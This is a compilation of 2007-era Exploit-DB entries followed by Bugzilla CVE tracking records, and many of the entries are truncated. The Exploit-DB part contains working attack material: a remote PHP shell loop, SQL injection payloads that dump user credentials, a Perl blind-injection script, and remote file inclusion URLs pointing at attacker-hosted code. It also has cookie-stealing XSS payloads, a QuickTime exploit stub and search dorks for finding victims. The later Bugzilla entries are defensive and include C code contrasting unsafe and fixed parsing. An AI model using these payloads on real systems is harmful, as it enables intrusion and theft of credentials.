if(preg_match('`location: admin\.php\?op=ConfigFiles`', $pageshell)) { $ok = 1; }
unset($pageshell);
if(!$ok) {
die("Failed\r\n\r\nUnable to write PHP Code");
} else {
echo "OK\r\n\r\n";
}
while(1) {
unset($exec);
echo "[PhpShell@".$argv[1]."]$ ";
$input = trim(fgets(STDIN));
if($input == 'quit' || $input == 'exit') {
break;
}
$sock = @fsockopen($argv[1], 80, $eno, $estr, 30);
if (!$sock) {
die("\r\nCould not connect to ".$argv[1
Exploit-DB
exploitdb·2007-05-03
CVE-2007-2673 Censura 1.15.04 - 'censura.php?vendorid' SQL Injection
---
Censura v1.15.04 (vendorid) Remote SQL Injection
Found: Cyber-Security.org
Exploit:
censura.php?cmd=vendor_info&vendorid=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8,9,10,12,13,14,15,16/**/from/**/users/**/
google dork: "Powered by: Censura"
vendor: http://www.censura.info/
# milw0rm.com [2007-05-03]
Exploit-DB
exploitdb·2007-04-23
CVE-2007-2212 MyBulletinBoard (MyBB) 1.2.5 - 'calendar.php' Blind SQL Injection
---
#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;
if(!$ARGV[1])
{
print " \n";
print " #############################################################\n";
print " # MyBulletinBoard #\n";
print " # Example: perl mybb.pl www.host.com /mybb/ -u 5 #\n";
print " # #\n";
print " # Options: #\n";
print " # -u User-ID, default: 1 #\n";
print " # -p Proxy support #\n";
print " #############################################################\n";
exit;
}
my $host = $ARGV[0];
my $path = $ARGV[1];
my $userid = 1;
my %options = ();
GetOptions(\%options, "u=i", "p=s");
print "[+] Exploiting...\n";
if($options{"u"})
{
$userid = $options{"u"};
}
syswrite(STDOUT, "[+] MD5-Hash: ", 14);
for(my $i = 1; $i new;
my $query = "http://".$
Exploit-DB
exploitdb·2007-04-16
CVE-2007-2070 SunShop Shopping Cart 3.5 - 'abs_path' Remote File Inclusion
---
sunshop 4 (index.php) Remote File Include Vulnerability
# scripts : SunShop v3.5
# Discovered By : irvian
# scripts site : http://www.turnkeywebtools.com/sunshop/
# Thanks To : #hitamputih #nyubicrew #patihack
# special To : nyubi,ibnusina,arioo,jipank,kacung,trangkil,cah_gemblunkz,permenhack
# dork : "powered by sunshop"
bug found:
Exploit: www.target.com/index.php?abs_path=[evilcode]
www.target.com/checkout.php?abs_path=[evilcode]
# milw0rm.com [2007-04-16]
Exploit-DB
exploitdb·2007-04-10
CVE-2007-2008 pl-PHP Beta 0.9 - Multiple Vulnerabilities
---
. . .
._ | _. .|_ _. _.;_/
[_)|(_]\_|[ )(_](_.| \.net
| ._|
"pL-PHP beta 0.9 - MULTIPLE VULNERABILITIES"
by Omni
1) Infos
Date : 2007-04-10
Product : pL-PHP
Version : beta 0.9 - Prior versions may also be affected
Vendor : http://sourceforge.net/projects/pl-php/ - http://www.karlcore.com/programming/blog/
Vendor Status : 2007-04-10 -> Not Informed!
Description : pL-PHP is a new PHP Portal or Content Management System (CMS). It is based on a "multi-topics" system,
with sub-topics, and all the content (downloads, articles, headers, links...) is shared into these topics
and sub-topics. It will be very easy to use.
Source : omnipresent - omni
E-mail : omnipresent[at]email[dot]it - omni[at]playhack[dot]net
Team : Playhack.net Security
2) Sec
Exploit-DB
exploitdb·2007-03-20
CVE-2007-1606 W-Agora 4.2.1 - 'change_password.php?userid' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/23057/info
w-Agora is prone to multiple input-validation vulnerabilities, including possible SQL-injection issues and multiple cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
w-Agora 4.2.1 is vulnerable.
http://www.example.com/w-agora/change_password.php?newpasswd1=1&newpasswd2=1&passwd=1&site=hello&userid='"><script>alert(document.cookie)</script>
Exploit-DB
exploitdb·2007-03-16
CVE-2007-1508 DirectAdmin 1.292 - 'CMD_USER_STATS' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/22996/info
DirectAdmin is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/CMD_USER_STATS?RESULT='http://example2.com/script.js'
Exploit-DB
exploitdb·2007-03-10
CVE-2007-1423 work system E-Commerce 3.0.5 - Remote File Inclusion
---
#####################################################################################
Rodrigo Duarte
Wuefez[AT]2die4.com ;D
WORK system e-commerce:
WORK PHP,Mysql content management system CMS e-commerce or not : ajax, workflow,
content,package,language,currency,country,price,stock,group user,CSS,banner,logo,
link,partner,forum,new,FAQ,event,calendar,invoice,mailing,supplier,RSS, webservices.
Vulnerable Script:
~ include_top.php
(Other scripts of this project are also vulnerable with $g_include)
Vulnerable Code:
include ($g_include."include_logo.php");
PoC:
http://example/[WORK_system_path]/include/include_top.php?g_include=http://shell
d0rk:
[your_creativity_here]
greetz:
Cocada, FoNSECA, maxim noob
SHiKaA, ZeUsSixSixS
Exploit-DB
Apple QuickTime 7.1.3 - 'HREFTrack' Cross-Zone Scripting
exploitdb·2007-01-03
CVE-2007-0059 Apple QuickTime 7.1.3 - 'HREFTrack' Cross-Zone Scripting
Apple QuickTime 7.1.3 - 'HREFTrack' Cross-Zone Scripting
---
#!/usr/bin/ruby
#
# (c) 2006 LMH
# Original scripting and POC by Aviv Raff (http://aviv.raffon.net).
#
# Description:
# Exploit for MOAB-03-01-2007. If argument 'serve' is passed, it uses port 21 for running the
# fake FTP server (required). HTTP server port can be modified but it's
# not recommended. Adjust as necessary.
#
# see http://projects.info-pull.com/moab/MOAB-03-01-2007.html
require 'socket'
require 'fileutils'
require 'webrick'
trap 0, proc {
puts "-- Terminating: #{$$}"
}
REMOTE_HOST = "192.168.1.133" # Modify to match IP address or hostname
REMOTE_URL = "http://#{REMOTE_HOST}/" # Modify to match target path (ex. /mypath)
TARGET_SCRIPT = "on error resume next\r\n" +
"Set c = CreateObject(\"ADODB.Connection\")\r\n
Bugzilla
CVE-2022-50068 kernel: drm/ttm: Fix dummy res NULL ptr deref bug
bugzilla·2025-06-18·CVSS 5.5
CVE-2022-50068 [MEDIUM] CVE-2022-50068 kernel: drm/ttm: Fix dummy res NULL ptr deref bug
CVE-2022-50068 kernel: drm/ttm: Fix dummy res NULL ptr deref bug
In the Linux kernel, the following vulnerability has been resolved:
drm/ttm: Fix dummy res NULL ptr deref bug
Check the bo->resource value before accessing the resource
mem_type.
v2: Fix commit description unwrapped warning
[ 40.191227][ T184] general protection fault, probably for non-canonical address 0xdffffc0000000002: 0000 [#1] SMP KASAN PTI
[ 40.192995][ T184] KASAN: null-ptr-deref in range [0x0000000000000010-0x0000000000000017]
[ 40.194411][ T184] CPU: 1 PID: 184 Comm: systemd-udevd Not tainted 5.19.0-rc4-00721-gb297c22b7070 #1
[ 40.196063][ T184] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.0-debian-1.16.0-4 04/01/2014
[ 40.199605][ T184] RIP: 0010:ttm_bo_validate+0x1b3/0x240 [ttm]
[ 40.2007
Bugzilla
CVE-2007-0899 clamav: heap based overflow in libclamav/fsg.c
bugzilla·2019-11-12·CVSS 9.8
CVE-2007-0899 [CRITICAL] CVE-2007-0899 clamav: heap based overflow in libclamav/fsg.c
CVE-2007-0899 clamav: heap based overflow in libclamav/fsg.c
There is a possible heap overflow in libclamav/fsg.c before 0.100.0.
Reference:
https://security-tracker.debian.org/tracker/CVE-2007-0899
Discussion:
Created clamav tracking bugs for this issue:
Affects: epel-all [bug 1771395]
Affects: fedora-all [bug 1771394]
---
(In reply to Dhananjay Arunesh from comment #0)
> There is a possible heap overflow in libclamav/fsg.c before 0.100.0.
>
> Reference:
> https://security-tracker.debian.org/tracker/CVE-2007-0899
https://apps.fedoraproject.org/packages/clamav
Rawhide 0.101.4-1.fc32 None
Fedora 32 0.101.4-1.fc32 None
Fedora 31 0.101.4-1.fc31 None
Fedora 30 0.101.4-1.fc30 (update) None
Fedora 29 0.101.4-1.fc29 (update) None
Fedora EPEL 8 0.101.4-1.el8 None
Fedora EPEL 7 0.101.4-1.e
Bugzilla
CVE-2007-3962 fsplib multiple buffer overflows
bugzilla·2007-08-10·CVSS 7.5
CVE-2007-3962 [HIGH] CVE-2007-3962 fsplib multiple buffer overflows
CVE-2007-3962 fsplib multiple buffer overflows
Multiple stack-based buffer overflows in fsplib.c in fsplib before 0.9 might
allow remote attackers to execute arbitrary code via (1) a long filename that is
not properly handled by the fsp_readdir_native function when MAXNAMLEN is
greater than 255, or (2) a long d_name directory (dirent) field in the
fsp_readdir function.
gFTP contains local copy of fsplib source code to support FSP protocol.
Discussion:
fsplib upstream patches:
http://fsp.cvs.sourceforge.net/fsp/fsplib/fsplib.c?r1=1.17&r2=1.18
http://fsp.cvs.sourceforge.net/fsp/fsplib/fsplib.c?r1=1.21&r2=1.22
http://fsp.cvs.sourceforge.net/fsp/fsplib/fsplib.h?r1=1.12&r2=1.13
gFTP patch:
http://svn.gnome.org/viewcvs/gftp/trunk/lib/fsplib/fsplib.c?r1=747&r2=768
---
Both issue only aff
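Both fsplib overflows have the same shape: a name length chosen by the remote FSP server is used directly as the size of a copy into a fixed, dirent-sized name buffer. The following is an added example and not fsplib's or gFTP's code; the record layout (a 2-byte big-endian length followed by the name bytes), the fsp_entry struct, the 255-byte local limit and the sample listing are all constructed for illustration.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example, not fsplib's code.  A directory listing from the remote,
 * untrusted FSP server is modelled as a constructed stream of records,
 * [2-byte big-endian name length][name bytes]; the local entry mirrors a
 * dirent with the 255-character d_name limit the advisory refers to. */

#define LOCAL_NAME_MAX 255

struct fsp_entry {
    char d_name[LOCAL_NAME_MAX + 1];
    uint16_t d_namlen;
};

static uint16_t be16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }

/* Before: the length the server sent is used as the copy size.  Anything
 * over 255 bytes runs past d_name and, since callers keep the entry on the
 * stack, into the caller's frame.  Kept for comparison; never called. */
int read_entry_unchecked(const uint8_t *rec, size_t reclen, struct fsp_entry *e)
{
    if (reclen < 2) return -1;
    uint16_t n = be16(rec);
    if (reclen < 2u + n) return -1;
    memcpy(e->d_name, rec + 2, n);       /* n is not bounded by sizeof d_name */
    e->d_name[n] = '\0';
    e->d_namlen = n;
    return 0;
}

/* After: the wire length is data, not a size.  Bound it by the local buffer
 * and reject what does not fit rather than truncating, since a truncated
 * name could alias another entry in the same directory. */
int read_entry_checked(const uint8_t *rec, size_t reclen, struct fsp_entry *e)
{
    if (reclen < 2) return -1;
    uint16_t n = be16(rec);
    if (reclen < 2u + n) return -1;                  /* shorter than it claims */
    if (n == 0 || n > LOCAL_NAME_MAX) return -1;     /* would not fit d_name */
    if (memchr(rec + 2, '\0', n) != NULL) return -1; /* embedded NUL */
    memcpy(e->d_name, rec + 2, n);
    e->d_name[n] = '\0';
    e->d_namlen = n;
    return 0;
}

/* Walk a whole listing.  Returns the number of entries accepted, or -1 at
 * the first malformed record so a poisoned listing is never half-trusted. */
int read_listing(const uint8_t *buf, size_t len, struct fsp_entry *out, int max)
{
    int count = 0;
    size_t off = 0;
    while (off < len && count < max) {
        if (read_entry_checked(buf + off, len - off, &out[count]) != 0)
            return -1;
        off += 2u + out[count].d_namlen;
        count++;
    }
    return count;
}

/* Helper for exercising the parser: one record whose name is namelen 'A's. */
int parse_synthetic_name(size_t namelen)
{
    static uint8_t rec[2 + 1024];
    struct fsp_entry e;
    if (namelen > 1024) return -2;
    rec[0] = (uint8_t)(namelen >> 8);
    rec[1] = (uint8_t)(namelen & 0xff);
    memset(rec + 2, 'A', namelen);
    return read_entry_checked(rec, 2 + namelen, &e);
}

/* Constructed listing: "README", "src", then a record claiming 300 bytes
 * (0x012c) while carrying 3, which is what a hostile server would send. */
static const uint8_t POISONED_LISTING[] = {
    0, 6, 'R', 'E', 'A', 'D', 'M', 'E',
    0, 3, 's', 'r', 'c',
    1, 44, 'p', 'w', 'n',
};

int count_poisoned_listing(void)
{
    struct fsp_entry ents[8];
    return read_listing(POISONED_LISTING, sizeof POISONED_LISTING, ents, 8);
}

int count_clean_listing(void)
{
    struct fsp_entry ents[8];
    return read_listing(POISONED_LISTING, 13, ents, 8);   /* first two records only */
}

int main(void)
{
    printf("clean listing: %d entries\n", count_clean_listing());
    printf("poisoned listing: %d (rejected)\n", count_poisoned_listing());
    printf("300-byte name: %d (rejected)\n", parse_synthetic_name(300));
    return 0;
}
```

The rejection in read_entry_checked is deliberate: silently cutting a 300-byte name down to 255 would let the server present two distinct remote names as one local entry, which is its own class of bug.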
Bugzilla
CVE-2007-3387 xpdf integer overflow [F7]
bugzilla·2007-08-09·CVSS 6.8
CVE-2007-3387 [MEDIUM] CVE-2007-3387 xpdf integer overflow [F7]
CVE-2007-3387 xpdf integer overflow [F7]
F7 tracking bug: see blocks bug list for full details of the security issue(s).
[bug automatically created by: add-tracking-bugs]
Discussion:
cups-1.2.12-4.fc7 has been pushed to the Fedora 7 stable repository. If problems still persist, please make note of it in this bug report.
Bugzilla
CVE-2007-2876 {ip, nf}_conntrack_sctp: remotely triggerable NULL ptr dereference
bugzilla·2007-06-11·CVSS 6.1
CVE-2007-2876 [MEDIUM] CVE-2007-2876 {ip, nf}_conntrack_sctp: remotely triggerable NULL ptr dereference
CVE-2007-2876 {ip, nf}_conntrack_sctp: remotely triggerable NULL ptr dereference
+++ This bug was initially created as a clone of Bug #243245 +++
From Vilmos Nebehaj:
When creating a new connection by sending an unknown chunk type, we don't
transition to a valid state, causing a NULL pointer dereference in sctp_packet
when accessing sctp_timeouts[SCTP_CONNTRACK_NONE].
Discussion:
This request was evaluated by Red Hat Product Management for inclusion in a Red
Hat Enterprise Linux maintenance release. Product Management has requested
further review of this request by Red Hat Engineering, for potential
inclusion in a Red Hat Enterprise Linux Update release for currently deployed
products. This request is not yet committed for inclusion in an Update
release.
---
committed in stream rhel
Bugzilla
CVE-2007-2052 Off-by-one in python's locale.strxfrm()
bugzilla·2007-04-03·CVSS 5.0
CVE-2007-2052 [MEDIUM] CVE-2007-2052 Off-by-one in python's locale.strxfrm()
CVE-2007-2052 Off-by-one in python's locale.strxfrm()
+++ This bug was initially created as a clone of Bug #235093 +++
Description of problem:
Modules/_localemodule.c:361
356 n1 = strlen(s) + 1;
357 buf = PyMem_Malloc(n1);
358 if (!buf)
359 return PyErr_NoMemory();
360 n2 = strxfrm(buf, s, n1);
In case the transformed string is longer than original string...
(see the PoC for an example)
361 if (n2 > n1) {
362 /* more space needed */
We allocate n2 bytes here:
363 buf = PyMem_Realloc(buf, n2);
364 if (!buf)
365 return PyErr_NoMemory();
And here the string will be n2 chars long and the terminating NUL won't
fit, so the string won't be terminated, which can lead to an
information leak in certain rare cases (see the original Debian report
for details).
366 strxfrm(buf, s, n2);
367 }
36
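The sizing rule behind the bug report above is that strxfrm() returns the length the full transform needs with the NUL excluded, so a buffer of exactly that many bytes is always one short; the same rule also means the `n2 > n1` comparison misses the n2 == n1 case, which is equally one byte short. The following is an added example and not CPython's code; it shows the allocation discipline the _localemodule.c sequence needed (a bounded transform that reports when the buffer was too small, the two-pass query-then-allocate idiom, and the report's growth path with both fixes applied). The expansion branch is only taken in a locale whose collation weights are longer than the input, so in the default "C" locale it is exercised structurally rather than by a longer output.

```c
#include <locale.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
 * Added example, not CPython's code.  strxfrm(dst, src, n) writes at most
 * n bytes, NUL included, and returns the length the complete transform
 * needs, NUL excluded.  If that return value is >= n, the contents of dst
 * are indeterminate: that is the unterminated buffer the bug report
 * describes.
 */

/* Transform s into dst[cap].  Returns the transformed length, or -1 when
 * cap bytes are not enough, in which case dst holds nothing usable. */
long xfrm_into(char *dst, size_t cap, const char *s)
{
    size_t need = strxfrm(dst, s, cap);
    if (need >= cap)            /* ">=", not ">": need excludes the NUL */
        return -1;
    return (long)need;
}

/* Two-pass transform with exact sizing: ask strxfrm how much room it wants,
 * allocate that plus one for the NUL, then transform for real.  Returns a
 * malloc'd string the caller frees, or NULL on allocation failure or if the
 * second pass disagrees with the first (locale changed between the calls). */
char *xfrm_dup(const char *s)
{
    size_t need = strxfrm(NULL, s, 0);      /* size query; writes nothing */
    char *buf = malloc(need + 1);
    if (!buf)
        return NULL;
    if (strxfrm(buf, s, need + 1) != need) {
        free(buf);
        return NULL;
    }
    return buf;
}

/* The growth path the bug report walks through, with both fixes applied:
 * compare with >= and reallocate n2 + 1, so the NUL always has a byte. */
char *xfrm_dup_grow(const char *s)
{
    size_t n1 = strlen(s) + 1;
    char *buf = malloc(n1);
    if (!buf)
        return NULL;
    size_t n2 = strxfrm(buf, s, n1);
    if (n2 >= n1) {                          /* first buffer was too small */
        char *nb = realloc(buf, n2 + 1);     /* room for the terminator */
        if (!nb) {
            free(buf);
            return NULL;
        }
        buf = nb;
        strxfrm(buf, s, n2 + 1);
    }
    return buf;
}

/* Self-check: transform s both ways and confirm the results are identical,
 * terminated, and of the length strxfrm reported.  Returns 1 on success. */
int xfrm_selfcheck(const char *s)
{
    char *a = xfrm_dup(s), *b = xfrm_dup_grow(s);
    int ok = a && b && strlen(a) == strxfrm(NULL, s, 0) && strcmp(a, b) == 0;
    free(a);
    free(b);
    return ok;
}

int main(void)
{
    char small[4];
    printf("into 4 bytes: %ld\n", xfrm_into(small, sizeof small, "abc"));   /* fits */
    printf("into 3 bytes: %ld\n", xfrm_into(small, 3, "abc"));            /* -1 */
    printf("selfcheck: %d\n", xfrm_selfcheck("hello"));
    return 0;
}
```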
Bugzilla
CVE-2007-0994 Thunderbird arbitrary javascript command execution
bugzilla·2007-03-02·CVSS 6.8
CVE-2007-0994 [MEDIUM] CVE-2007-0994 Thunderbird arbitrary javascript command execution
CVE-2007-0994 Thunderbird arbitrary javascript command execution
A bug was found in the way Thunderbird handles tags. To quote the
upstream bug:
When javascript: url is set by script, the access checks work properly.
i.src = "javascript:...";
But, when javascript: url is set by (or , ) tag, the access
checks don't work properly.
Thus, sandboxed script can access xbl.method's clone parent and xbl compilation
scope to run arbitrary code with chrome privileges.
Discussion:
Lifting embargo
---
An advisory has been issued which should help the problem
described in this bug report. This report is therefore being
closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files,
please follow the link below. You may reopen this bug report
Bugzilla
CVE-2007-0653 XMMS multiple issues (CVE-2007-0654)
bugzilla·2007-02-09·CVSS 9.3
CVE-2007-0653 [CRITICAL] CVE-2007-0653 XMMS multiple issues (CVE-2007-0654)
CVE-2007-0653 XMMS multiple issues (CVE-2007-0654)
Sven Krewitt of Secunia reported two flaws he discovered in the way XMMS handles
skin files. Here are the technical details provided by Sven:
--- Details ---
CVE-2007-0654
1) An integer underflow error exists when loading skin bitmap images,
which can be exploited to cause a stack-based buffer overflow via
specially crafted skin images containing manipulated header information.
The vulnerability is caused due to errors within "read_bmp()" in
xmms/bmp.c when loading skin bitmap images.
-- xmms/bmp.c --
GdkPixmap *read_bmp(gchar * filename)
[...]
fseek(file, 8, SEEK_CUR);
read_le_long(file, &offset); <-- [1]
read_le_long(file, &headSize);
[...]
else if (bitcount != 24 && bitcount != 16 && bitcount != 32)
{
gint ncols, i;
ncols = offset
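The read_bmp() excerpt above breaks off just as ncols is derived from the header's offset and headSize fields, both of which the skin file controls. The following is an added example, constructed and not xmms code: a model of that palette-sizing step, with the unchecked arithmetic beside a version that refuses a wrapping subtraction and bounds the count by the 256-entry array it fills. The field positions (offset at byte 10, header size at byte 14, little-endian, matching the read_le_long() calls quoted above), the helper functions and the generated sample images are assumptions made for illustration.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example, not xmms code: the palette-sizing step of a BMP skin
 * loader, where the entry count is derived from two header fields the file
 * controls.  Field positions are assumed: pixel-data offset at byte 10,
 * info-header size at byte 14, both little-endian. */

#define FILE_HDR 14
#define MAX_PALETTE 256

struct rgb_quad { uint8_t b, g, r, reserved; };

static uint32_t le32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Before: unsigned subtraction on attacker-chosen fields.  An offset smaller
 * than headsize + 14 wraps to a huge count; a large offset gives a large
 * count directly.  Either, used as the loop bound for a 256-entry stack
 * array, is the overflow the advisory describes.  Never used for loading. */
long palette_entries_unchecked(uint32_t offset, uint32_t headsize)
{
    uint32_t bytes = offset - headsize - FILE_HDR;   /* may wrap */
    return (long)(bytes / 4);
}

/* After: refuse the wrap, then bound the count by the array it will fill. */
long palette_entries_checked(uint32_t offset, uint32_t headsize)
{
    if (headsize > UINT32_MAX - FILE_HDR) return -1;
    uint32_t start = headsize + FILE_HDR;
    if (offset < start) return -1;                  /* subtraction would wrap */
    uint32_t entries = (offset - start) / 4;
    if (entries > MAX_PALETTE) return -1;           /* would overrun rgb[] */
    return (long)entries;
}

/* Parse the two header fields from an in-memory file and copy the palette
 * into a fixed array.  Returns the entry count, or -1 for a bad header or a
 * file shorter than the header claims. */
int load_palette(const uint8_t *img, size_t len, struct rgb_quad rgb[MAX_PALETTE])
{
    if (len < FILE_HDR + 4) return -1;
    uint32_t offset = le32(img + 10), headsize = le32(img + 14);
    long n = palette_entries_checked(offset, headsize);
    if (n < 0) return -1;
    size_t start = (size_t)headsize + FILE_HDR;
    if (len < start || len - start < (size_t)n * 4) return -1;
    for (long i = 0; i < n; i++) {
        const uint8_t *p = img + start + (size_t)i * 4;
        rgb[i].b = p[0]; rgb[i].g = p[1]; rgb[i].r = p[2]; rgb[i].reserved = p[3];
    }
    return (int)n;
}

/* Constructed test input: a minimal header carrying the given offset and
 * headsize fields, followed by `entries` palette entries.  Returns the image
 * length written, or 0 if it does not fit in cap. */
size_t make_skin_bmp(uint8_t *out, size_t cap, uint32_t offset,
                     uint32_t headsize, int entries)
{
    size_t len = FILE_HDR + (size_t)headsize + (size_t)entries * 4;
    if (len > cap) return 0;
    memset(out, 0, len);
    out[0] = 'B'; out[1] = 'M';
    for (int i = 0; i < 4; i++) {
        out[10 + i] = (uint8_t)(offset >> (8 * i));
        out[14 + i] = (uint8_t)(headsize >> (8 * i));
    }
    for (int i = 0; i < entries; i++) {
        uint8_t *p = out + FILE_HDR + headsize + (size_t)i * 4;
        p[0] = (uint8_t)i; p[1] = (uint8_t)(i * 2); p[2] = (uint8_t)(i * 3);
    }
    return len;
}

/* Build an image with `entries` real palette entries but a header claiming
 * `offset`, then try to load it; returns load_palette's result. */
int try_skin(uint32_t offset, uint32_t headsize, int entries)
{
    static uint8_t img[4096];
    struct rgb_quad rgb[MAX_PALETTE];
    size_t len = make_skin_bmp(img, sizeof img, offset, headsize, entries);
    if (len == 0) return -2;
    return load_palette(img, len, rgb);
}

int main(void)
{
    printf("honest 2-entry skin: %d\n", try_skin(62, 40, 2));
    printf("offset below palette start, unchecked count: %ld\n",
           palette_entries_unchecked(10, 40));
    printf("same header, checked: %d\n", try_skin(10, 40, 2));
    printf("300 entries, checked: %d\n", try_skin(54 + 300 * 4, 40, 300));
    return 0;
}
```

The two rejections in palette_entries_checked are independent: the first stops the wrap that turns a too-small offset into a count in the billions, the second stops an honest-looking but oversized count; the file-length check in load_palette then catches a header that claims more palette bytes than the file holds.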
2007-04-12
Published